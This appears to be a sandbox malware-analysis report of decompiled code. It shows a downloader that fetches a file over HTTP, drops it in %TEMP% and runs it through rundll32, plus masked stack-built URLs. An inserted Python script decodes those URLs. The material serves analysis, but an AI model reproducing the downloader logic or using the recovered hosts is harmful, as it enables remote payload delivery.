                                                            				char _v75;
                                                            				char _v76;
                                                            				char _v80;
                                                            				char _v84;
                                                            				intOrPtr _v88;
                                                            				intOrPtr _v92;
                                                            				char _v96;
                                                            				char _v97;
                                                            				char _v98;
                                                            				char _v99;
                                                            				char _v100;
                                                            				char _v101;
                                                            				char _v102;
                                                            				char _v103;
                                                            				char _v104;
                                                            				char _v105;
                                                            				char _v106;
                                                            				char _v107;
                                                            				char _v108;
                                                            				short _v628;
                                                            				_Unknown_base(*)()* _v632;
                                                            				intOrPtr _v636;
                                                            				char _v640;
                                                            				intOrPtr _v644;
                                                            				short _v648;
                                                            				_Unknown_base(*)()* _v652;
                                                            				intOrPtr _v656;
                                                            				char _v660;
                                                            				intOrPtr _v664;
                                                            				intOrPtr _v668;
                                                            				char _v672;
                                                            				WCHAR* _v676;
                                                            				char _v680;
                                                            				intOrPtr _v684;
                                                            				intOrPtr _v688;
                                                            				intOrPtr _v692;
                                                            				intOrPtr _v696;
                                                            				intOrPtr _v700;
                                                            				intOrPtr _v704;
                                                            				intOrPtr _v708;
                                                            				intOrPtr _v712;
                                                            				intOrPtr _v716;
                                                            				intOrPtr _v720;
                                                            				short _v724;
                                                            				intOrPtr _v728;
                                                            				intOrPtr _v732;
                                                            				intOrPtr _v736;
                                                            				intOrPtr _v740;
                                                            				intOrPtr _v744;
                                                            				intOrPtr _v748;
                                                            				intOrPtr _v752;
                                                            				intOrPtr _v756;
                                                            				signed int _t157;
                                                            				intOrPtr _t162;
                                                            				intOrPtr* _t163;
                                                            				intOrPtr _t170;
                                                            				intOrPtr _t172;
                                                            				signed int _t181;
                                                            				long _t187;
                                                            				intOrPtr _t212;
                                                            				intOrPtr _t221;
                                                            				intOrPtr _t222;
                                                            				intOrPtr _t246;
                                                            				intOrPtr _t247;
                                                            				intOrPtr _t251;
                                                            				intOrPtr* _t252;
                                                            				long _t263;
                                                            				void* _t271;
                                                            				void* _t272;
                                                            				signed int _t273;
                                                            				void* _t274;
                                                            				intOrPtr* _t275;
                                                            				intOrPtr* _t276;
                                                            
                                                            				_t272 = __esi;
                                                            				_t271 = __edi;
                                                            				_t245 = __edx;
                                                            				_t209 = __ebx;
                                                            				_t157 =  *0x40f020; // 0xebf16b9c
                                                            				_v64 = _t157 ^ _t273;
                                                            				_v12 = 0;
                                                            				_v8 = 0;
                                                            				E004011B0(0x411070, _a4);
                                                            				_v16 =  *0x411068(0x40de0c, 0, 0x17, 0x40ddfc,  &_v8);
                                                            				if(_v16 >= 0) {
                                                            					_t246 =  *0x40fcd8; // 0x0
                                                            					_v740 = _t246;
                                                            					_t162 =  *0x40fcdc; // 0x0
                                                            					_v736 = _t162;
                                                            					_t212 =  *0x40fce0; // 0x80020004
                                                            					_v732 = _t212;
                                                            					_t247 =  *0x40fce4; // 0x0
                                                            					_v728 = _t247;
                                                            					_t275 = _t274 - 0x10;
                                                            					_t163 = _t275;
                                                            					 *_t163 = _v740;
                                                            					 *((intOrPtr*)(_t163 + 4)) = _v736;
                                                            					 *((intOrPtr*)(_t163 + 8)) = _v732;
                                                            					 *((intOrPtr*)(_t163 + 0xc)) = _v728;
                                                            					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x24))))(_v8, L"GET", E00401540(0x411070));
                                                            					__eflags = _v16;
                                                            					if(_v16 >= 0) {
                                                            						_t221 =  *0x40fcd8; // 0x0
                                                            						_v756 = _t221;
                                                            						_t251 =  *0x40fcdc; // 0x0
                                                            						_v752 = _t251;
                                                            						_t172 =  *0x40fce0; // 0x80020004
                                                            						_v748 = _t172;
                                                            						_t222 =  *0x40fce4; // 0x0
                                                            						_v744 = _t222;
                                                            						_t276 = _t275 - 0x10;
                                                            						_t252 = _t276;
                                                            						 *_t252 = _v756;
                                                            						 *((intOrPtr*)(_t252 + 4)) = _v752;
                                                            						 *((intOrPtr*)(_t252 + 8)) = _v748;
                                                            						 *((intOrPtr*)(_t252 + 0xc)) = _v744;
                                                            						_v16 =  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x34))))(_v8);
                                                            						__eflags = _v16;
                                                            						if(_v16 >= 0) {
                                                            							_v20 =  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x38))))(_v8,  &_v24);
                                                            							__eflags = _v16;
                                                            							if(_v16 >= 0) {
                                                            								__eflags = _v24 - 0xc8;
                                                            								if(_v24 == 0xc8) {
                                                            									E00401440(__ebx, _v8,  &_v52);
                                                            									_t181 = _v52 & 0x0000ffff;
                                                            									__eflags = _t181 - 0x2011;
                                                            									if(_t181 == 0x2011) {
                                                            										__imp__#17(_v44);
                                                            										_v60 = _t181;
                                                            										__eflags = _v60 - 1;
                                                            										if(_v60 == 1) {
                                                            											__imp__#20(_v44, 1,  &_v56);
                                                            											__imp__#19(_v44, 1,  &_v28);
                                                            											_v28 = _v28 + 1;
                                                            											__imp__#23(_v44,  &_v32);
                                                            											_v676 = 0;
                                                            											_v96 = 0x620064;
                                                            											_v92 = 0x64002e;
                                                            											_v88 = 0x740061;
                                                            											_v84 = 0;
                                                            											_v672 = 0x620064;
                                                            											_v668 = 0x64002e;
                                                            											_v664 = 0x6c006c;
                                                            											_v660 = 0;
                                                            											__eflags = _a8 - 1;
                                                            											if(_a8 != 1) {
                                                            												_v676 =  &_v672;
                                                            											} else {
                                                            												_v676 =  &_v96;
                                                            											}
                                                            											_v648 = 0x450054;
                                                            											_v644 = 0x50004d;
                                                            											_v640 = 0;
                                                            											_t187 = GetEnvironmentVariableW( &_v648,  &_v628, 0x104);
                                                            											__eflags = _t187;
                                                            											if(_t187 != 0) {
                                                            												lstrcatW( &_v628, "\\");
                                                            												lstrcatW( &_v628, _v676);
                                                            												_v676 =  &_v628;
                                                            											}
                                                            											_v656 = E0040B250();
                                                            											__eflags = _a8 - 2;
                                                            											if(_a8 == 2) {
                                                            												_v724 = 0x750072;
                                                            												_v720 = 0x64006e;
                                                            												_v716 = 0x6c006c;
                                                            												_v712 = 0x320033;
                                                            												_v708 = 0x65002e;
                                                            												_v704 = 0x650078;
                                                            												_v700 = 0x220020;
                                                            												_v696 = 0x730025;
                                                            												_v692 = 0x2c0022;
                                                            												_v688 = 0x70006f;
                                                            												_v684 = 0x6e0065;
                                                            												_v680 = 0;
                                                            												wsprintfW(0x410c50,  &_v724, _v676);
                                                            												_t276 = _t276 + 0xc;
                                                            											}
                                                            											_v76 = 0x57;
                                                            											_v75 = 0x72;
                                                            											_v74 = 0x69;
                                                            											_v73 = 0x74;
                                                            											_v72 = 0x65;
                                                            											_v71 = 0x46;
                                                            											_v70 = 0x69;
                                                            											_v69 = 0x6c;
                                                            											_v68 = 0x65;
                                                            											_v67 = 0;
                                                            											_v108 = 0x43;
                                                            											_v107 = 0x6c;
                                                            											_v106 = 0x6f;
                                                            											_v105 = 0x73;
                                                            											_v104 = 0x65;
                                                            											_v103 = 0x48;
                                                            											_v102 = 0x61;
                                                            											_v101 = 0x6e;
                                                            											_v100 = 0x64;
                                                            											_v99 = 0x6c;
                                                            											_v98 = 0x65;
                                                            											_v97 = 0;
                                                            											_t124 =  &_v76; // 0x57
                                                            											_v652 = GetProcAddress(E0040B090(), _t124);
                                                            											_t126 =  &_v108; // 0x43
                                                            											_v632 = GetProcAddress(E0040B090(), _t126);
                                                            											_v636 = E0040B1B0(_t209, _t126, _t271, _t272, __eflags, _v676);
                                                            											__eflags = _v636 - 0xffffffff;
                                                            											if(_v636 != 0xffffffff) {
                                                            												__eflags = _a8 - 2;
                                                            												if(_a8 != 2) {
                                                            													_t263 = _v28 - _v56;
                                                            													__eflags = _t263;
                                                            													_v652(_v636, _v32, _t263,  &_v80, 0);
                                                            												} else {
                                                            													E0040AED0(_t194, _v28 - _v56 - 0x1751, _v32 + 0x1751, _v28 - _v56 - 0x1751);
                                                            													_v652(_v636, _v32 + 0x1751, _v28 - _v56 - 0x1751,  &_v80, 0);
                                                            												}
                                                            												_v632(_v636);
                                                            												_v12 = 1;
                                                            											}
                                                            											__imp__#24(_v44);
                                                            										}
                                                            									}
                                                            									E004013A0( &_v52);
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					_t245 =  *_v8;
                                                            					 *((intOrPtr*)( *((intOrPtr*)( *_v8 + 8))))(_v8);
                                                            					_t170 = _v12;
                                                            					goto L23;
                                                            				} else {
                                                            					_t170 = _v12;
                                                            					L23:
                                                            					return E0040158C(_t170, _t209, _v64 ^ _t273, _t245, _t271, _t272);
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 004011B0: SysFreeString.OLEAUT32(?), ref: 004011C7
                                                              • Part of subcall function 004011B0: SysAllocString.OLEAUT32(?), ref: 004011D7
                                                            • SafeArrayGetDim.OLEAUT32(?), ref: 0040B407
                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040B424
                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040B434
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$BoundString$AllocFree
                                                            • String ID: $"$%$.$.$.$3$CloseHandle$GET$M$T$WriteFile$a$d$d$e$l$l$n$o$r$x
                                                            • API String ID: 3733012023-1576864280
                                                            • Opcode ID: 8348f4f3d00b15aae75aa9e81ad00ad7bac9ea643b3389176f1a395d4abf057e
                                                            • Instruction ID: 4ecabf40e4453d729f9e28f24bf90e9b6dd5012648f85afd37e8fd1231670d8f
                                                            • Opcode Fuzzy Hash: 8348f4f3d00b15aae75aa9e81ad00ad7bac9ea643b3389176f1a395d4abf057e
                                                            • Instruction Fuzzy Hash: 01E14974D04258DFDB14DFA4C988BDEBBB5BF48304F1081A9E509BB291CB795A88CF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			// Builds two UTF-16 URL strings on the stack (two of the dwords are stored with a 0x31774615 mask and
                                                            			// corrected below), formats the first with the function resolved by E0040B250 (wsprintfW per the API notes)
                                                            			// and the value at 0x410034, initializes COM, then calls E0040B270 on each string in a retry loop.
                                                            			E0040BA50(void* __ebx, void* __edi, void* __esi) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				char _v40;
                                                            				intOrPtr _v44;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				char _v68;
                                                            				intOrPtr _v72;
                                                            				intOrPtr _v76;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v84;
                                                            				intOrPtr _v88;
                                                            				intOrPtr _v92;
                                                            				intOrPtr _v96;
                                                            				intOrPtr _v100;
                                                            				char _v104;
                                                            				intOrPtr _v108;
                                                            				intOrPtr _v112;
                                                            				intOrPtr _v116;
                                                            				intOrPtr _v120;
                                                            				intOrPtr _v124;
                                                            				intOrPtr _v128;
                                                            				char _v132;
                                                            				signed int _v136;
                                                            				char _v660;
                                                            				_Unknown_base(*)()* _v664;
                                                            				intOrPtr _v668;
                                                            				signed int _t51;
                                                            				void* _t63;
                                                            				void* _t64;
                                                            				void* _t67;
                                                            				intOrPtr _t70;
                                                            				void* _t78;
                                                            				void* _t79;
                                                            				signed int _t80;
                                                            				void* _t81;
                                                            				void* _t82;
                                                            
                                                            				_t79 = __esi;
                                                            				_t78 = __edi;
                                                            				_t67 = __ebx;
                                                            				_t51 =  *0x40f020; // 0xebf16b9c
                                                            				_v136 = _t51 ^ _t80;
                                                            				_v132 = 0x740068;
                                                            				_v128 = 0x700074;
                                                            				_v124 = 0x3a0073;
                                                            				_v120 = 0x2f002f;
                                                            				_v116 = 0x2e0076;
                                                            				_v112 = 0x31f0468d;
                                                            				_v108 = 0x67007a;
                                                            				_v104 = 0x31e44676;
                                                            				_v100 = 0x760065;
                                                            				_v96 = 0x63002e;
                                                            				_v92 = 0x6d006f;
                                                            				_v88 = 0x25002f;
                                                            				_v84 = 0x2e0064;
                                                            				_v80 = 0x740068;
                                                            				_v76 = 0x6c006d;
                                                            				_v72 = 0;
                                                            				_v68 = 0x740068;
                                                            				_v64 = 0x700074;
                                                            				_v60 = 0x3a0073;
                                                            				_v56 = 0x2f002f;
                                                            				_v52 = 0x2e0076;
                                                            				_v48 = 0x31f0468d;
                                                            				_v44 = 0x67007a;
                                                            				_v40 = 0x31e44676;
                                                            				_v36 = 0x760065;
                                                            				_v32 = 0x63002e;
                                                            				_v28 = 0x6d006f;
                                                            				_v24 = 0x6c002f;
                                                            				_v20 = 0x67006f;
                                                            				_v16 = 0x2e006f;
                                                            				_v12 = 0x6e0070;
                                                            				_v8 = 0x67;
                                                            				_v112 = _v112 - 0x31774615;
                                                            				_v48 = _v48 - 0x31774615;
                                                            				_t38 =  &_v104; // 0x31e44676
                                                            				_v104 =  *_t38 - 0x31774615;
                                                            				_t40 =  &_v40; // 0x31e44676
                                                            				_v40 =  *_t40 - 0x31774615;
                                                            				_v668 = E0040B250();
                                                            				_t70 =  *0x410034; // 0x38f
                                                            				_t76 =  &_v132;
                                                            				_v668( &_v660,  &_v132, _t70);
                                                            				_t82 = _t81 + 0xc;
                                                            				_v664 = GetProcAddress(E0040B130(), "CoInitialize");
                                                            				_v664(0);
                                                            				while(1) {
                                                            					_t63 = E0040B270(_t67, _t76, _t78, _t79,  &_v660, 1);
                                                            					_t82 = _t82 + 8;
                                                            					if(_t63 != 0) {
                                                            						goto L3;
                                                            					}
                                                            				}
                                                            				while(1) {
                                                            					L3:
                                                            					_t77 =  &_v68;
                                                            					_t64 = E0040B270(_t67,  &_v68, _t78, _t79,  &_v68, 2);
                                                            					_t82 = _t82 + 8;
                                                            					if(_t64 != 0) {
                                                            						break;
                                                            					}
                                                            				}
                                                            				return E0040158C(E0040B730(_t67,  &_v68, _t78, _t79, 0x410c50), _t67, _v136 ^ _t80, _t77, _t78, _t79);
                                                            			}

                                                            0x0040ba50
                                                            0x0040ba50
                                                            0x0040ba50
                                                            0x0040ba59
                                                            0x0040ba60
                                                            0x0040ba66
                                                            0x0040ba6d
                                                            0x0040ba74
                                                            0x0040ba7b
                                                            0x0040ba82
                                                            0x0040ba89
                                                            0x0040ba90
                                                            0x0040ba97
                                                            0x0040ba9e
                                                            0x0040baa5
                                                            0x0040baac
                                                            0x0040bab3
                                                            0x0040baba
                                                            0x0040bac1
                                                            0x0040bac8
                                                            0x0040bacf
                                                            0x0040bad6
                                                            0x0040badd
                                                            0x0040bae4
                                                            0x0040baeb
                                                            0x0040baf2
                                                            0x0040baf9
                                                            0x0040bb00
                                                            0x0040bb07
                                                            0x0040bb0e
                                                            0x0040bb15
                                                            0x0040bb1c
                                                            0x0040bb23
                                                            0x0040bb2a
                                                            0x0040bb31
                                                            0x0040bb38
                                                            0x0040bb3f
                                                            0x0040bb4e
                                                            0x0040bb5a
                                                            0x0040bb5d
                                                            0x0040bb66
                                                            0x0040bb69
                                                            0x0040bb71
                                                            0x0040bb79
                                                            0x0040bb7f
                                                            0x0040bb86
                                                            0x0040bb91
                                                            0x0040bb97
                                                            0x0040bbab
                                                            0x0040bbb3
                                                            0x0040bbb9
                                                            0x0040bbc2
                                                            0x0040bbc7
                                                            0x0040bbcc
                                                            0x00000000
                                                            0x00000000
                                                            0x0040bbce
                                                            0x0040bbd0
                                                            0x0040bbd0
                                                            0x0040bbd2
                                                            0x0040bbd6
                                                            0x0040bbdb
                                                            0x0040bbe0
                                                            0x00000000
                                                            0x00000000
                                                            0x0040bbe2
                                                            0x0040bc01

                                                            APIs
                                                              • Part of subcall function 0040B250: GetProcAddress.KERNEL32(00000000,wsprintfW), ref: 0040B25E
                                                              • Part of subcall function 0040B130: LoadLibraryA.KERNELBASE(OLE32), ref: 0040B15C
                                                            • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 0040BBA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: .$.$/$/$/$/$CoInitialize$d$g$h$h$h$m$o$o$o$o$p$s$s$t$t$v$v$vF1e$vF1e$z$z
                                                            • API String ID: 2238633743-1388441996
                                                            • Opcode ID: 26bfa028fd92e02be19c4815d7085b7a5eff42b40c05db2e34abeaf3e16427b4
                                                            • Instruction ID: 29c4d6fe62a38ab3825c0bf816cb8c3261ebc723cec8645cf58b77fc56d4057a
                                                            • Opcode Fuzzy Hash: 26bfa028fd92e02be19c4815d7085b7a5eff42b40c05db2e34abeaf3e16427b4
                                                            • Instruction Fuzzy Hash: EB4104B0D00208CBDF10EFA5D9497ADBBB1BB04308F10856DD5097B255DBBA5A88CFA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
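The stack stores in E0040BA50 above are a classic stack-string construction: each 32-bit immediate holds two UTF-16LE code units, and two of the dwords are written with an additive mask that the code removes by subtracting 0x31774615 before use. The following decoder is an added example and is not part of the Joe Sandbox report or of the sample; the dword lists are transcribed from the listing, and it assumes, as the report's API notes indicate, that E0040B250 returns wsprintfW and that the only conversion in the format string is %d with the value 0x38f that the listing annotates at 0x410034. Run it to recover the two strings the function feeds to E0040B270 and check them against the report's network section.

```python
import struct

# Mask the listing removes from two of the dwords (_v112/_v104 and _v48/_v40).
KEY = 0x31774615

# _v132 .. _v72, transcribed from the E0040BA50 listing in stack order.
# A (dword, key) pair marks a value the code fixes up as dword - key.
FMT_STRING_DWORDS = [
    0x740068, 0x700074, 0x3a0073, 0x2f002f, 0x2e0076,
    (0x31f0468d, KEY), 0x67007a, (0x31e44676, KEY),
    0x760065, 0x63002e, 0x6d006f, 0x25002f, 0x2e0064,
    0x740068, 0x6c006d, 0,
]

# _v68 .. _v8, same layout; the final 0x67 dword carries its own NUL terminator.
SECOND_STRING_DWORDS = [
    0x740068, 0x700074, 0x3a0073, 0x2f002f, 0x2e0076,
    (0x31f0468d, KEY), 0x67007a, (0x31e44676, KEY),
    0x760065, 0x63002e, 0x6d006f, 0x6c002f, 0x67006f,
    0x2e006f, 0x6e0070, 0x67,
]

# Assumption: the third wsprintfW argument is *0x410034, annotated as 0x38f in the listing.
WSPRINTF_ARG = 0x38f


def decode_stack_wstring(dwords):
    """Reassemble a UTF-16LE string built from 32-bit stack stores.

    Each entry is a plain dword or a (dword, key) pair whose real value is
    (dword - key) mod 2**32, mirroring the listing's fix-up step. Decoding
    stops at the first NUL code unit, as the original wide-string code would.
    """
    raw = bytearray()
    for item in dwords:
        if isinstance(item, tuple):
            value, key = item
            value = (value - key) & 0xFFFFFFFF
        else:
            value = item
        raw += struct.pack("<I", value)  # little-endian: low code unit first
    text = raw.decode("utf-16-le", errors="replace")
    nul = text.find("\x00")
    return text if nul < 0 else text[:nul]


def format_like_wsprintf(fmt, arg):
    """Apply the single %d conversion the way wsprintfW would (signed decimal)."""
    return fmt.replace("%d", str(arg))


def recover_urls():
    """Return the format string and both fully decoded strings passed to E0040B270."""
    fmt = decode_stack_wstring(FMT_STRING_DWORDS)
    return {
        "format": fmt,
        "first_url": format_like_wsprintf(fmt, WSPRINTF_ARG),
        "second_url": decode_stack_wstring(SECOND_STRING_DWORDS),
    }


if __name__ == "__main__":
    for name, value in recover_urls().items():
        print(f"{name}: {value}")
```

The same decoder works for any function in the report that fills adjacent stack slots with wide-character immediates; only the dword list and, where the sample applies one, the arithmetic key change.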

                                                            C-Code - Quality: 91%
                                                            			// CRT start-up code, consistent with the MSVC runtime's _mtinit: resolves FlsAlloc/FlsGetValue/FlsSetValue/FlsFree
                                                            			// from KERNEL32.DLL with a Tls* fallback, stores the pointers encoded, allocates the 0x214-byte per-thread data
                                                            			// block and records the current thread id in it. Not sample-specific logic.
                                                            			E0040338E(void* __ebx) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				_Unknown_base(*)()* _t7;
                                                            				long _t10;
                                                            				void* _t11;
                                                            				int _t12;
                                                            				void* _t18;
                                                            				intOrPtr _t21;
                                                            				long _t26;
                                                            				void* _t30;
                                                            				struct HINSTANCE__* _t37;
                                                            				void* _t40;
                                                            				void* _t42;
                                                            
                                                            				_t30 = __ebx;
                                                            				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                            				if(_t37 != 0) {
                                                            					 *0x410510 = GetProcAddress(_t37, "FlsAlloc");
                                                            					 *0x410514 = GetProcAddress(_t37, "FlsGetValue");
                                                            					 *0x410518 = GetProcAddress(_t37, "FlsSetValue");
                                                            					_t7 = GetProcAddress(_t37, "FlsFree");
                                                            					__eflags =  *0x410510;
                                                            					_t40 = TlsSetValue;
                                                            					 *0x41051c = _t7;
                                                            					if( *0x410510 == 0) {
                                                            						L6:
                                                            						 *0x410514 = TlsGetValue;
                                                            						 *0x410510 = E004030AE;
                                                            						 *0x410518 = _t40;
                                                            						 *0x41051c = TlsFree;
                                                            					} else {
                                                            						__eflags =  *0x410514;
                                                            						if( *0x410514 == 0) {
                                                            							goto L6;
                                                            						} else {
                                                            							__eflags =  *0x410518;
                                                            							if( *0x410518 == 0) {
                                                            								goto L6;
                                                            							} else {
                                                            								__eflags = _t7;
                                                            								if(_t7 == 0) {
                                                            									goto L6;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					_t10 = TlsAlloc();
                                                            					__eflags = _t10 - 0xffffffff;
                                                            					 *0x40f2c4 = _t10;
                                                            					if(_t10 == 0xffffffff) {
                                                            						L15:
                                                            						_t11 = 0;
                                                            						__eflags = 0;
                                                            					} else {
                                                            						_t12 = TlsSetValue(_t10,  *0x410514);
                                                            						__eflags = _t12;
                                                            						if(_t12 == 0) {
                                                            							goto L15;
                                                            						} else {
                                                            							E00403944();
                                                            							 *0x410510 = E00402FDF( *0x410510);
                                                            							 *0x410514 = E00402FDF( *0x410514);
                                                            							 *0x410518 = E00402FDF( *0x410518);
                                                            							 *0x41051c = E00402FDF( *0x41051c);
                                                            							_t18 = E00401C23();
                                                            							__eflags = _t18;
                                                            							if(_t18 == 0) {
                                                            								L14:
                                                            								E004030E1();
                                                            								goto L15;
                                                            							} else {
                                                            								_push(E0040326D);
                                                            								_t21 =  *((intOrPtr*)(E0040304B( *0x410510)))();
                                                            								__eflags = _t21 - 0xffffffff;
                                                            								 *0x40f2c0 = _t21;
                                                            								if(_t21 == 0xffffffff) {
                                                            									goto L14;
                                                            								} else {
                                                            									_t42 = E00403552(1, 0x214);
                                                            									__eflags = _t42;
                                                            									if(_t42 == 0) {
                                                            										goto L14;
                                                            									} else {
                                                            										_push(_t42);
                                                            										_push( *0x40f2c0);
                                                            										__eflags =  *((intOrPtr*)(E0040304B( *0x410518)))();
                                                            										if(__eflags == 0) {
                                                            											goto L14;
                                                            										} else {
                                                            											_push(0);
                                                            											_push(_t42);
                                                            											E0040311E(_t30, _t37, _t42, __eflags);
                                                            											_t26 = GetCurrentThreadId();
                                                            											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                            											 *_t42 = _t26;
                                                            											_t11 = 1;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					return _t11;
                                                            				} else {
                                                            					E004030E1();
                                                            					return 0;
                                                            				}
                                                            			}

                                                            0x0040338e
                                                            0x0040339a
                                                            0x0040339e
                                                            0x004033be
                                                            0x004033cb
                                                            0x004033d8
                                                            0x004033dd
                                                            0x004033df
                                                            0x004033e6
                                                            0x004033ec
                                                            0x004033f1
                                                            0x00403409
                                                            0x0040340e
                                                            0x00403418
                                                            0x00403422
                                                            0x00403428
                                                            0x004033f3
                                                            0x004033f3
                                                            0x004033fa
                                                            0x00000000
                                                            0x004033fc
                                                            0x004033fc
                                                            0x00403403
                                                            0x00000000
                                                            0x00403405
                                                            0x00403405
                                                            0x00403407
                                                            0x00000000
                                                            0x00000000
                                                            0x00403407
                                                            0x00403403
                                                            0x004033fa
                                                            0x0040342d
                                                            0x00403433
                                                            0x00403436
                                                            0x0040343b
                                                            0x0040350d
                                                            0x0040350d
                                                            0x0040350d
                                                            0x00403441
                                                            0x00403448
                                                            0x0040344a
                                                            0x0040344c
                                                            0x00000000
                                                            0x00403452
                                                            0x00403452
                                                            0x00403468
                                                            0x00403478
                                                            0x00403488
                                                            0x00403495
                                                            0x0040349a
                                                            0x0040349f
                                                            0x004034a1
                                                            0x00403508
                                                            0x00403508
                                                            0x00000000
                                                            0x004034a3
                                                            0x004034a3
                                                            0x004034b4
                                                            0x004034b6
                                                            0x004034b9
                                                            0x004034be
                                                            0x00000000
                                                            0x004034c0
                                                            0x004034cc
                                                            0x004034ce
                                                            0x004034d2
                                                            0x00000000
                                                            0x004034d4
                                                            0x004034d4
                                                            0x004034d5
                                                            0x004034e9
                                                            0x004034eb
                                                            0x00000000
                                                            0x004034ed
                                                            0x004034ed
                                                            0x004034ef
                                                            0x004034f0
                                                            0x004034f7
                                                            0x004034fd
                                                            0x00403501
                                                            0x00403505
                                                            0x00403505
                                                            0x004034eb
                                                            0x004034d2
                                                            0x004034be
                                                            0x004034a1
                                                            0x0040344c
                                                            0x00403511
                                                            0x004033a0
                                                            0x004033a0
                                                            0x004033a8
                                                            0x004033a8

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00401930), ref: 00403394
                                                            • __mtterm.LIBCMT ref: 004033A0
                                                              • Part of subcall function 004030E1: __decode_pointer.LIBCMT ref: 004030F2
                                                              • Part of subcall function 004030E1: TlsFree.KERNEL32(00000005,0040350D), ref: 0040310C
                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004033B6
                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004033C3
                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004033D0
                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004033DD
                                                            • TlsAlloc.KERNEL32 ref: 0040342D
                                                            • TlsSetValue.KERNEL32(00000000), ref: 00403448
                                                            • __init_pointers.LIBCMT ref: 00403452
                                                            • __encode_pointer.LIBCMT ref: 0040345D
                                                            • __encode_pointer.LIBCMT ref: 0040346D
                                                            • __encode_pointer.LIBCMT ref: 0040347D
                                                            • __encode_pointer.LIBCMT ref: 0040348D
                                                            • __decode_pointer.LIBCMT ref: 004034AE
                                                            • __calloc_crt.LIBCMT ref: 004034C7
                                                            • __decode_pointer.LIBCMT ref: 004034E1
                                                            • __initptd.LIBCMT ref: 004034F0
                                                            • GetCurrentThreadId.KERNEL32 ref: 004034F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                            • API String ID: 2657569430-3819984048
                                                            • Opcode ID: 4071aec27f7d09c471dda12a253f7bbca169d07f9d8b340a498e5a629070b856
                                                            • Instruction ID: 9f9584be4b56187a013b53a262d2f6cdf5c805aaa557de8ed8451558a70591cd
                                                            • Opcode Fuzzy Hash: 4071aec27f7d09c471dda12a253f7bbca169d07f9d8b340a498e5a629070b856
                                                            • Instruction Fuzzy Hash: DE315370940205FAD721EF75AD45A563EAAAB00759B10863BE410F62F1EBF98781CF9C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 39%
			/* Shape of the MSVC CRT free(): with the heap lock held (__lock(4)), try the
			   small-block heap when *0x4111cc (the CRT's __active_heap selector) equals 3,
			   otherwise HeapFree() the block on the CRT heap handle at *0x4103b4 and, on
			   failure, store the mapped GetLastError() value into errno (the
			   *E00401B5B() = E00401B20(GetLastError()) pattern is the _errno()/_dosmaperr idiom).
			   Trailing comments give the instruction address of each line. */
